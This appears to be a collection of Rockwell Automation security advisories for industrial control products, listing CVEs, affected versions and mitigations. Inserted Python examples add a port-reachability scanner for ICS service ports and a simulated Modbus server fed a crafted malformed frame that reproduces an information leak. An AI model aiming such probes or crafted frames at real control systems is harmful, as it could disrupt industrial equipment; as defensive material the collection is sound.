Arena® Simulation Software | V16.00 | 16.20.01

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-29460 IMPACT
An arbitrary code execution vulnerability was reported to Rockwell Automation that could allow a malicious user to execute arbitrary code in the software by triggering a memory buffer overflow.
CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer


Known Exploited Vulnerability (KEV) database: No

CVE-2023-29461 IMPACT
An arbitrary code execution vulnerability was reported to Rockwell Automation that could allow a malicious user to execute arbitrary code in the software by triggering a heap-based memory buffer overflow.
CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer


Known Exploited Vulnerability (KEV) database: No

CVE-2023-29462 IMPACT
An arbitrary code execution vulnerability was reported to Rockwell Automation that could allow a malicious user to execute arbitrary code in the software by triggering a heap-based memory buffer overflow.
CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible.
  • Upgrade to 16.20.01 which has been patched to mitigate these issues.
  • For information on how to mitigate Security Risks on industrial automation control systems (IACS) networks see the following publications:
    • System Security Design Guidelines Reference Manual publication, SECURE-RM001
    • Configure System Security Features User Manual, SECURE-UM001
  • Additionally, we encourage the customer to implement our QA43240 - Recommended Security Guidelines from Rockwell Automation to minimize risk of the vulnerability.

Additional Resources

  • CVE-2023-29460 JSON
  • CVE-2023-29461 JSON
  • CVE-2023-29462 JSON

Critical
PN1410 | FactoryTalk® Diagnostics Vulnerable to Remote Code Execution
Published Date:
April 10, 2023
Last Updated:
April 10, 2023
CVE IDs:
CVE-2020-6967
Products:
FactoryTalk Services Platform
CVSS Scores:
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.3
Revision History
Version 1.0 – February 20, 2020. Initial Release
Version 1.1 – June 18, 2020. Pwn2Own Co-Discovery
Version 1.2 – February 10, 2023
Version 1.3 – April 10, 2023 – Added v6.31 Mitigations

Executive Summary

The Zero Day Initiative (ZDI), part of the information security company Trend Micro, reported a remote code execution (RCE) vulnerability in FactoryTalk® Services Platform to Rockwell Automation. Specifically, the vulnerability is found in the FactoryTalk Diagnostics subsystem, which provides customers the functionality to collect and view diagnostic messages from the FactoryTalk system for analysis and troubleshooting purposes.


FactoryTalk Diagnostics is utilized by many Rockwell Automation® products. We encourage customers to follow the steps provided to understand if they are affected.

Special thanks to rgod of 9sg working with ZDI to find this vulnerability. This vulnerability was co-discovered during the first ever Industrial Control Systems (ICS) Pwn2Own competition hosted by Trend Micro’s Zero Day Initiative (ZDI).

Affected Products

FactoryTalk Services Platform (v2.00 – v6.11)
The FactoryTalk Services Platform is delivered as part of the FactoryTalk suite of software from Rockwell Automation, including most products branded FactoryTalk or Studio 5000® software.

Vulnerability Details

CVE-2020-6967: Remote Code Execution due to Vulnerable .NET Remoting Instance
FactoryTalk Diagnostics exposes a remote network port at tcp/8082, which may allow an attacker to execute arbitrary code with SYSTEM level privileges.

CVSS v3.1 Base Score: 9.8/CRITICAL
CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

ZDI Tracking: ZDI-CAN-10268

Risk Mitigation & User Action

Rockwell Automation will resolve this vulnerability in the next release of the FactoryTalk Services Platform. Until then, customers using the affected software are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy. Please subscribe to updates to this advisory and the PN1354 - Industrial Security Advisory Index to stay notified.

Update: The vulnerability has been resolved with the release of FactoryTalk Services Platform V6.31.

Product Family | Suggested Actions
FactoryTalk Services Platform V6.31 | No actions are necessary:
  • This version supports Microsoft Windows Communication Foundation (WCF), which avoids the vulnerability.
  • This version supports .NET Remoting (the system default) with connections restricted to a local port, which mitigates the vulnerability.

FactoryTalk Services Platform V2.00 – V6.11 | We have provided guidance for customers affected by this vulnerability to assess whether the service is installed, and steps for implementing the recommended mitigations. Customers should consider implementing the following measures based on their needs:
  • Upgrade to FactoryTalk Services Platform V6.31.
  • For versions that predate V6.20, upgrade to V6.20 or later; that version restricts the connection settings to the local port only. If updating is not possible:
    • For versions 2.74, 2.80, 2.81, 2.90, 3.00, 6.10, or 6.11, install the patch BF24822 - Patch: FactoryTalk Diagnostics Local Reader service connection settings restricted to local access only, FactoryTalk Services 6.11, 6.10, 3.00, 2.90, 2.80, 2.81, 2.74, which restricts the connection settings to the local port only.
    • For versions that predate 2.74, upgrade to a more recent version.
  • Disable the Remote Diagnostics Service if it is not in use. Disabling this service does not result in data loss.
  • If the service is in use, use the Windows Firewall configuration to help prevent remote connections to the affected port (tcp/8082).
  • Steps for both of these measures can be found in Risk mitigation for FactoryTalk Diagnostics remoting endpoint.

Note: A Snort rule for this issue is available in Snort’s developer rules (sid: 32474).

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products

  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that .NET Remoting connections from unauthorized sources are blocked.
  • Ensure that software-based firewalls are running with current rule sets and enforced on individual systems.
  • Consider implementing network security protocols for software systems, such as IPSec. Documentation is available in QA46277 - Deploying FactoryTalk Software with IPsec, outlining guidelines for implementing IPSec with FactoryTalk applications.

Software/PC-based Mitigation Strategies

  • Use of Microsoft® AppLocker or a similar application whitelisting tool can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available in QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Mitigations

  • Use trusted software, software patches, and antivirus/antimalware programs, and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the PN1354 - Industrial Security Advisory Index for Rockwell Automation.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (KAByrd@ra.rockwell.com).

Additional Links

  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • ICSA-20-051-02
  • ZDI-20-261

Critical
PN1618 | ThinManager Software Path Traversal and Denial-Of-Service Attack
Published Date:
March 21, 2023
Last Updated:
March 21, 2023
CVE IDs:
CVE-2023-27855, CVE-2023-27857, CVE-2023-27856, CVE-2023-28757
Products:
ThinManager
CVSS Scores:
7.5, 9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 – March 21, 2023 – Initial Version

Executive Summary

Vulnerabilities were discovered by Tenable security researchers and reported to Rockwell Automation. They were found in the ThinManager® ThinServer™ software. Successful exploitation could allow an attacker to perform remote code execution on the target or to crash the software.

Customers using the products in scope are encouraged to evaluate the mitigations provided and apply them appropriately to their deployed products. See the additional details relating to the discovered vulnerabilities, including recommended countermeasures.

Affected Products

ThinManager ThinServer software Versions
6.x – 10.x
11.0.0 – 11.0.5
11.1.0 – 11.1.5
11.2.0 – 11.2.6
12.0.0 – 12.0.4
12.1.0 – 12.1.5
13.0.0-13.0.1

Vulnerability Details

CVE-2023-27855 ThinManager ThinServer Path Traversal Upload

CVSS Base Score: 9.8 /10 (Critical)
CVSS 3.1 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


In affected versions, a path traversal exists when processing a message. An unauthenticated remote attacker could potentially exploit this vulnerability to upload arbitrary files to any directory on the disk drive where ThinServer.exe is installed. The attacker can overwrite existing executable files with attacker-controlled, malicious content, potentially causing remote code execution.

CVE-2023-27856 ThinManager ThinServer Path Traversal Download

CVSS Base Score: 7.5 /10 (High)
CVSS 3.1 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N


In affected versions, a path traversal exists when processing a message of type 8. An unauthenticated remote attacker can exploit this vulnerability to download arbitrary files from the disk drive where ThinServer.exe is installed.

CVE-2023-27857 ThinManager ThinServer Heap-Based Buffer Overflow

CVSS Base Score: 7.5/10 (High)
CVSS 3.1 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H


In affected versions, a heap-based buffer over-read condition occurs when the message field indicates more data than is present in the message field. An unauthenticated remote attacker can exploit this vulnerability to crash ThinServer.exe due to a read access violation.

Risk Mitigation & User Action

Customers are directed towards the risk mitigations provided, and are encouraged, when possible, to combine these mitigations with the general security guidelines to employ multiple strategies simultaneously.
CVE-2023-27855, CVE-2023-27856, CVE-2023-27857
First Known Affected | Fixed Versions
6.x – 10.x | These versions are retired. Please update to a supported version.
11.0.0 – 11.0.5 | Update to v11.0.6
11.1.0 – 11.1.5 | Update to v11.1.6
11.2.0 – 11.2.6 | Update to v11.2.7
12.0.0 – 12.0.4 | Update to v12.0.5
12.1.0 – 12.1.5 | Update to v12.1.6
13.0.0 – 13.0.1 | Update to v13.0.2

Additional Mitigations

If customers are unable to update to the patched version, the following mitigations should be put in place:
  • Limiting remote access to TCP port 2031 to known thin clients and ThinManager servers reduces, but does not eliminate, the opportunity to exploit these vulnerabilities.
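The port restriction above, the local-only setting and firewall rule for FactoryTalk Diagnostics on tcp/8082 (PN1410), and the Telnet/FTP ports left open on Kinetix 5500 v7.13 drives (PN1624) all come down to one question: is the port still reachable from a host that should not be able to reach it? The checker below answers that with a bare TCP connect and no payload. It is an added example, not Rockwell tooling; the port-to-advisory table, the placeholder target 192.0.2.10 and the loopback self-test helpers are this example's own.

```python
"""Reachability check for the TCP services the advisories above say
should be closed, local-only, or reachable only from known peers.
Added example, not Rockwell tooling; 192.0.2.10 is a placeholder
(TEST-NET-1) address."""
import socket
import sys
from concurrent.futures import ThreadPoolExecutor

# Port -> the advisory that cares about it (this example's own table)
ADVISORY_PORTS = {
    21:   "FTP open by default on Kinetix 5500 v7.13 (PN1624, CVE-2023-1834)",
    23:   "Telnet open by default on Kinetix 5500 v7.13 (PN1624, CVE-2023-1834)",
    2031: "ThinManager ThinServer (PN1618); limit to known thin clients/servers",
    8082: "FactoryTalk Diagnostics .NET Remoting (PN1410); local-only or firewalled",
}


def tcp_open(host, port, timeout=1.0):
    """True if a TCP three-way handshake to host:port completes, False on
    refusal or timeout. Nothing is sent on the connection, which keeps the
    probe gentle on embedded stacks."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def check_host(host, ports=ADVISORY_PORTS, timeout=1.0):
    """{port: reachable?} for one host, probing all ports concurrently."""
    with ThreadPoolExecutor(max_workers=max(1, len(ports))) as pool:
        results = list(pool.map(lambda p: (p, tcp_open(host, p, timeout)), ports))
    return dict(results)


def exposed(host, ports=ADVISORY_PORTS, timeout=1.0):
    """Sorted list of the ports that answered: the ones still needing the
    advisory's mitigation (firmware update, service disabled, or a firewall
    rule between this host and the device)."""
    return sorted(p for p, ok in check_host(host, ports, timeout).items() if ok)


def report(hosts, ports=ADVISORY_PORTS, timeout=1.0):
    """One line per exposed host/port, ready to paste into a ticket."""
    return [f"{host}\t{port}/tcp reachable\t{ports.get(port, '')}"
            for host in hosts for port in exposed(host, ports, timeout)]


def start_loopback_listener():
    """Self-test helper: a listener on 127.0.0.1 at an ephemeral port.
    Returns (socket, port); the caller closes the socket."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)
    return srv, srv.getsockname()[1]


def unused_loopback_port():
    """Self-test helper: an ephemeral port with nothing listening on it."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    # Run from a host in a zone that should NOT reach the device;
    # an empty report is the desired outcome.
    targets = sys.argv[1:] or ["192.0.2.10"]
    lines = report(targets)
    print("\n".join(lines) if lines else "no advisory ports reachable")
```

Read the result in the advisory's terms: 21 or 23 reachable on a Kinetix 5500 means the v7.14 update has not been applied; 8082 reachable from a remote host means the Diagnostics endpoint is not restricted to the local port and is not firewalled; 2031 reachable from a host that is neither a thin client nor a ThinManager server means the access restriction is not in place.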

For additional security best practices, please see our Knowledgebase article, QA43240 - Recommended Security Guidelines from Rockwell Automation, to maintain the security posture of your environment.

References

  • QA41731 - ThinManager Upgrade Instructions
  • CVE-2023-27855
  • CVE-2023-27856
  • CVE-2023-28757

Medium
PN1619 | Modbus TCP AOI Server Could Leak Sensitive Information
Published Date:
March 16, 2023
Last Updated:
October 16, 2024
CVE IDs:
CVE-2023-0027
Products:
1768/1769/5069 CompactLogix, 1756 ControlLogix
CVSS Scores (v3.1):
5.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 – March 16, 2023

Executive Summary

Rockwell Automation received a report from researchers at Veermata Jijabai Technological Institute of a vulnerability that was contained within the Modbus TCP Server Add-On Instructions (AOI) for ControlLogix® and CompactLogix™ controllers. This vulnerability may allow an unauthorized user to gain information when the Modbus TCP Server AOI accepts a malformed request.

Customers using affected versions of this software are encouraged to evaluate the following mitigations provided and apply them to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided in this security advisory.

Affected Products

  • Modbus TCP Server Add-On Instruction (AOI) for ControlLogix and CompactLogix controllers, used to connect to other devices via the Modbus TCP protocol. Rockwell Automation Sample Code Library ID: 101037.
    • Customers who do not use the AOI with a controller are not impacted.
    • The Modbus TCP Client AOI, which is part of the same sample code library, does not have this vulnerability.

Vulnerability Details

CVE-2023-0027 Rockwell Automation Modbus TCP Server Add-On Instruction Could Leak Sensitive Information
While the Modbus TCP Server AOI is in use, an unauthorized user could potentially send a malformed message causing the controller to respond with a copy of the most recent response to the last valid request. If exploited, an attacker could read the connected device’s Modbus TCP Server AOI information. It is impossible to exploit this vulnerability without knowing the Modbus address of the last valid request.


CVSS v3.1 Base Score: 5.3/10 [Medium]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
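The behaviour described above, a malformed request answered with a copy of the last good response, is what a server does when it stops parsing on error without clearing or replacing its response buffer. The example below is added here and is not the Rockwell AOI from Sample Code Library 101037: a strict Modbus/TCP frame parser whose length-field check is also the class of check the ThinManager heap over-read (CVE-2023-27857, above) lacked, a tiny FC 3 responder that can run in the vulnerable or the strict mode, and two constructed frames. The advisory does not say how AOI 2.04.00 handles a malformed request; the strict mode assumes the frame is discarded.

```python
"""Strict Modbus/TCP frame validation beside a model of the behaviour
CVE-2023-0027 describes (a malformed request answered with a copy of the
last good response). Added example: not the Rockwell AOI from Sample Code
Library 101037. The fixed AOI's handling is not described in the advisory;
'discard the malformed frame' is assumed here."""
import struct

MBAP_LEN = 7      # transaction id (2), protocol id (2), length (2), unit id (1)
MAX_PDU = 253     # Modbus/TCP ADU is at most 260 bytes, so PDU <= 253


def parse_frame(frame: bytes) -> dict:
    """Parse one Modbus/TCP ADU. The MBAP length field must equal the number
    of bytes that actually follow the first six; a parser that trusts the
    field instead reads past the end of a short frame."""
    if len(frame) < MBAP_LEN + 1:
        raise ValueError("frame shorter than MBAP header plus function code")
    tid, pid, length, unit = struct.unpack(">HHHB", frame[:MBAP_LEN])
    if pid != 0:
        raise ValueError(f"protocol id {pid}, expected 0")
    if length != len(frame) - 6:
        raise ValueError(f"length field says {length}, {len(frame) - 6} bytes follow")
    if length - 1 > MAX_PDU:
        raise ValueError("PDU exceeds the Modbus/TCP maximum")
    return {"tid": tid, "unit": unit, "fc": frame[7], "data": frame[8:]}


def build_frame(tid: int, unit: int, pdu: bytes) -> bytes:
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu


def read_holding_request(tid: int, unit: int, addr: int, count: int) -> bytes:
    return build_frame(tid, unit, struct.pack(">BHH", 3, addr, count))


class HoldingRegisterServer:
    """Tiny Modbus/TCP responder that only serves FC 3 (read holding registers)."""

    def __init__(self, registers: dict, strict: bool):
        self.registers = registers    # address -> 16-bit value
        self.strict = strict          # False models the vulnerable behaviour
        self.last_response = None     # the buffer the vulnerable path leaks

    @staticmethod
    def _exception(tid, unit, fc, code):
        return build_frame(tid, unit, bytes([fc | 0x80, code]))

    def handle(self, frame: bytes):
        try:
            req = parse_frame(frame)
        except ValueError:
            if self.strict:
                return None               # assumed fixed behaviour: drop the frame
            return self.last_response     # modelled CVE-2023-0027 behaviour
        if req["fc"] != 3 or len(req["data"]) != 4:
            return self._exception(req["tid"], req["unit"], req["fc"], 0x01)  # illegal function
        addr, count = struct.unpack(">HH", req["data"])
        if not 1 <= count <= 125 or any(a not in self.registers for a in range(addr, addr + count)):
            return self._exception(req["tid"], req["unit"], 3, 0x02)          # illegal data address
        payload = b"".join(struct.pack(">H", self.registers[a]) for a in range(addr, addr + count))
        resp = build_frame(req["tid"], req["unit"], bytes([3, len(payload)]) + payload)
        self.last_response = resp
        return resp


# Constructed sample traffic
REGISTERS = {0x0010: 0x1234, 0x0011: 0x5678}
VALID = read_holding_request(1, 1, 0x0010, 2)
# MBAP length field claims 20 bytes follow the first six; only 6 do
MALFORMED = struct.pack(">HHHB", 2, 0, 20, 1) + bytes([3, 0x00, 0x00, 0x00, 0x01])


def demo(strict: bool):
    """Send a valid read, then the malformed frame; return both answers."""
    srv = HoldingRegisterServer(REGISTERS, strict)
    return srv.handle(VALID), srv.handle(MALFORMED)


if __name__ == "__main__":
    for strict in (False, True):
        good, after_bad = demo(strict)
        print(f"strict={strict}: valid -> {good.hex()}, malformed -> "
              f"{after_bad.hex() if after_bad else 'dropped'}")
```

In the vulnerable mode the second answer is byte-for-byte the first one, so the register values read by the previous valid client come back to whoever sent the garbage. In the strict mode the length check fails before any response buffer is touched and nothing is sent.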

Risk Mitigation & User Action

Customers using the products in scope are encouraged to evaluate the following mitigations and apply them appropriately to their deployed products.
Products Affected | First Known Version Affected | Corrected In
Modbus TCP Add-On Instructions (AOI) Sample Code | 2.00.00 | 2.04.00 and later

General Security Guidelines

General security guidelines can be found in QA43240 - Recommended Security Guidelines from Rockwell Automation.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

  • PN1354 - Industrial Security Advisory Index
  • CVE-2023-0027 JSON

Disclaimer

This document is intended to provide general technical information on a particular subject or subjects and is not an exhaustive treatment of such subjects. Accordingly, the information in this document is not intended to constitute application, design, software or other professional engineering advice or services. Before making any decision or taking any action, which might affect your equipment, you should consult a qualified professional advisor.

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS DOCUMENT AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL AUTOMATION BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOST PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAS BEEN ADVISED OFTHE POSSIBILITY OF SUCH DAMAGES.

ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. NOTE THAT CERTAIN JURISDICTIONS DO NOT COUNTENANCE THE EXCLUSION OF IMPLIED WARRANTIES; THUS, THIS DISCLAIMER MAY NOT APPLY TO YOU.


Medium
PN1554 | CompactLogix 5370 and ControlLogix 5570 Controllers Vulnerable to Denial of Service Conditions due to Improper Input Validation
Published Date:
February 07, 2023
Last Updated:
February 07, 2023
CVE IDs:
CVE-2020-6998
Products:
1769 Compact GuardLogix 5370, 1769 CompactLogix 5370
CVSS Scores:
5.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.2
Revision History
Version 1.0 – March 2, 2021. Initial Release
Version 1.2 – February 7, 2023 - Updated affected products and risk mitigations section

Executive Summary

CompactLogix™ 5370 and ControlLogix® 5570 Programmable Automation Controllers (PACs) contain a vulnerability in the connection establishment algorithm that could allow a remote, unauthenticated attacker to cause infinite wait times in communications with other products resulting in denial of service conditions. The Cybersecurity & Infrastructure Security Agency (CISA) reported this vulnerability to Rockwell Automation by way of an anonymous researcher.

Customers using the affected products are strongly encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products.

Affected Products

The following products are affected:
  • CompactLogix 5370
  • Compact GuardLogix 5370
  • ControlLogix 5570
  • ControlLogix 5570 redundancy
  • GuardLogix 5570

Vulnerability Details

CVE-2020-6998: Improper Input Validation Causes Denial of Service Condition
The connection establishment algorithm found in CompactLogix 5370 and ControlLogix 5570 does not sufficiently manage its control flow during execution, creating an infinite loop. This may allow an attacker to send specially crafted CIP™ packet requests to a controller, which may cause denial of service conditions in communications with other products.

CVSS v3.1 Base Score: 5.8/10 [MEDIUM]
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L

Risk Mitigation & User Action

Customers using the affected products are encouraged to update to an available firmware version that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

CVE-2020-6998
Products Affected | First Known Version Affected | Corrected In
CompactLogix 5370, ControlLogix 5570, GuardLogix 5570 | 20.011 | 33.011 and later
Compact GuardLogix 5370 | 28.011 | 33.011 and later
ControlLogix 5570 Redundancy | 20.054 | 33.051 and later

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Consult the product documentation for specific features, such as a hardware mode switch setting, which may be used to block unauthorized changes.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.

General Mitigations
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).



ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • ICSA-21-061-02

Critical
PN1616 | CVE-2019-5096 and CVE-2019-5097 Vulnerabilities Impact Multiple Products
Published Date:
January 27, 2023
Last Updated:
January 27, 2023
CVE IDs:
CVE-2019-5097, CVE-2019-5096
Products:
1768/1769/5069 CompactLogix, 1769 Compact I/O, 1732E ArmorBlock I/O, 1756 ControlLogix, 1769 CompactLogix Controllers, 1747 SLC 500, 1756/1769/5069/2080 Chassis-based I/O, 1769 Compact GuardLogix 5370, 1756/5069 GuardLogix
CVSS Scores:
7.5, 9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 – January 27, 2023

Executive Summary

Rockwell Automation is aware of multiple products that utilize the GoAhead web server application and are affected by CVE-2019-5096 and CVE-2019-5097. Exploitation of these vulnerabilities could potentially have a high impact on the confidentiality, integrity and availability of the vulnerable devices. We have not received any notice of these vulnerabilities being exploited in Rockwell Automation products.

Customers using the products in scope are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerabilities, including impact and recommended countermeasures, are provided.

Affected Products

CVE-2019-5096 and CVE-2019-5097

Catalog Number Firmware Version
1732E-8CFGM8R/A 1.012
1732E-IF4M12R/A (discontinued) 1.012
1732E-IR4IM12R/A 1.012
1732E-IT4IM12R/A 1.012
1732E-OF4M12R/A 1.012
1732E-OB8M8SR/A 1.013
1732E-IB8M8SOER 1.012
1732E-8IOLM12R 2.011
1747-AENTR 2.002
1769-AENTR 1.001
5069-AEN2TR 3.011
1756-EN2TR/C <=11.001
1756-EN2T/D <=11.001
1756-EN2TSC/B (discontinued) 10.01
1756-EN2TSC/B 10.01
1756-HIST1G/A (discontinued) <=3.054
1756-HIST2G/A (discontinued) <=3.054
1756-HIST2G/B <=5.103

CVE-2019-5097

Catalog Number Firmware Version
ControlLogix® 5580 controllers V28 – V32*
GuardLogix® 5580 controllers V31 – V32*
CompactLogix™ 5380 controllers V28 – V32*
Compact GuardLogix 5380 controllers V31 – V32*
CompactLogix 5480 controllers V32*
1756-EN2T/D 11.001*
1756-EN2TR/C 11.001*
1756-EN3TR/B 11.001*
1756-EN2F/C 11.001*
1756-EN2TP/A 11.001*

* The vulnerability is only exploitable via the Ethernet port. It is not exploitable via backplane or USB communications.

Vulnerability Details

Rockwell Automation was made aware of two third-party vulnerabilities that affect the GoAhead embedded web server. A critical vulnerability (CVE-2019-5096) exists in the way requests are processed by the web server. If exploited, a malicious user could potentially leverage this vulnerability to execute arbitrary code by sending specially crafted HTTP requests to the targeted device.

Additionally, a denial-of-service (DoS) vulnerability (CVE-2019-5097) exists in the GoAhead web server. To exploit this vulnerability, a malicious user would have to send specially crafted HTTP requests and trigger an infinite loop in the process. If exploited, the targeted device could potentially crash.

CVE-2019-5096 EmbedThis GoAhead web server code execution vulnerability
CVSS Base Score: 9.8/10 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


CVE-2019-5097 EmbedThis GoAhead web server denial-of-service vulnerability
CVSS Base Score: 7.5/10 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

We encourage customers to apply the recommended mitigations, provided below.
Product Suggested Actions
1732E-8CFGM8R/A Refer to Additional Mitigations
1732E-IF4M12R/A Refer to Additional Mitigations
1732E-IR4IM12R/A Refer to Additional Mitigations
1732E-IT4IM12R/A Refer to Additional Mitigations
1732E-OF4M12R/A Refer to Additional Mitigations
1732E-OB8M8SR/A Refer to Additional Mitigations
1732E-IB8M8SOER Refer to Additional Mitigations
1732E-8IOLM12R Refer to Additional Mitigations
1747-AENTR Refer to Additional Mitigations
1769-AENTR Update to 1.003 or later
5069-AEN2TR (discontinued) Migrate to the 5069-AENTR
1756-EN2T/D Update to 11.002 or later
1756-EN2TR/C Update to 11.002 or later
1756-EN3TR/B Update to 11.002 or later
1756-EN2F/C Update to 11.002 or later
1756-EN2TP/A Update to 11.002 or later
1756-EN2TSC/B Refer to Additional Mitigations
1756-HIST1G/A (discontinued) Update to series B v5.104 or C 7.100 or later
1756-HIST2G/A (discontinued) Update to series B v5.104 or C 7.100 or later
1756-HIST2G/B Update to 5.104 or later
ControlLogix 5580 controllers Update to V32.016 or later
GuardLogix 5580 controllers Update to V32.016 or later
CompactLogix 5380 controllers Update to V32.016 or later
Compact GuardLogix 5380 controllers Update to V32.016 or later
CompactLogix 5480 Update to V32.016 or later

Additional Mitigations

If updating firmware is not possible or unavailable, we recommend the following compensating controls to help minimize risk of the vulnerability.
  • Disable the web server, if possible. Please review the corresponding product user manual for instructions, which can be found in the Rockwell Automation Literature Library.
    • For 1732E, upgrade to the latest firmware to disable the web server.
  • Configure firewalls to disallow network communication through HTTP/Port 80.
Please see our Knowledgebase article, QA43240 - Recommended Security Guidelines from Rockwell Automation, for more recommendations about maintaining the security posture of your environment.

References

  • NVD - CVE-2019-5096 (nist.gov)
  • NVD - CVE-2019-5097 (nist.gov)

